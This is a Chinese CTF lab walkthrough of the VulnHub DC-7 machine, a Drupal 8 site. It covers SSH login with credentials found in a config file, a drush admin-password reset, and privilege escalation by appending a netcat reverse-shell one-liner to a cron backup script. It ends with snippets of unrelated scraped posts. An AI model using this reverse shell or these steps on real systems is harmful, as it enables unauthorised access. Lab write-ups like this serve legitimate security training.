vulnhub dc 7靶機通關

2022-06-22 09:39:07 字數 1558 閱讀 5107

安裝好靶機環境,,下面會有一些提示,可是被我刪掉了,懶得做還原了,在自己的環境下應該能看到

歡迎來到dc-7

dc-7引入了一些「新」概念,但是我會讓您知道它們是什麼。:-)

儘管這一挑戰並不是技術性的全部,但是如果您需要訴諸於暴力破解或字典攻擊,那麼您可能不會成功。

您將要做的就是在盒子外面思考。

通過外掛程式得知**時通過drupal 8搭建

開放的埠有22,80

一開始我通過尋找druoal 8 的cve漏洞,無果,去檢視前輩們的思路,太菜了

在**的左下方,作者給出了乙個dc7的使用者

通過config檔案查詢到了資料庫的賬號密碼,嘗試登入後台無果

然後又想到了開放了22埠,就去測試一下ssh,登入成功

檢視當前目錄下的檔案,在這裡看到這個目錄下有乙個指令碼,定時執行**備份

進入此目錄檢視內容

通過檢視前輩們的思路,這裡的突破點在drush

這裡不能直接執行一些操作,許可權不夠

那麼就通過drush修改掉admin的密碼

drush user-password admin --password="123456"

在這個位置,可以上傳乙個模組

·
上傳完成之後,在這個位置填寫一句話,使用新新增的模板

進入到命令列,輸入**shell到指令碼中等待計畫任務執行,稍微等待後成功getshell。

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.220.155 1234 >/tmp/f" >> backups.sh

vulnhub dc 9靶機通關

vulnhub dc 9靶機通關 思路 sql注入登入 lfi 本地檔案包含 埠敲門 root提權 首先搭建好環境,我這裡使用nat模式,使用區域網掃瞄器,掃瞄到我142的位址 訪問頁面,點選幾下之後發現search這裡存在了搜尋功能,嘗試抓包看看有無注入 通過and 1 1 and 1 2判斷此處...

centos7通過firewalld配置閘道器伺服器

假設內網網段為 172.16.1.0 24 可訪問外網的內網伺服器的內網ip為 172.16.1.155 可訪問外網的內網伺服器的內網網路介面為 ens37 在可以訪問外網的伺服器上做如下配置 1 開啟ip forward vim etc sysctl.conf 在 etc sysctl.conf中...

COGS T 7 通訊線路

輸入檔案 mcst.in輸出檔案 mcst.out簡單對比 時間限制 1.5 s 記憶體限制 128 mb 問題描述 假設要在n個城市之間建立通訊聯絡網,則連通n個城市只需要n 1條線路。這時,如何在最少經費的前提下建立這個通訊網。在每兩個城市之間都可以設定 條線路,相應地都要付出一定的經濟代價。n...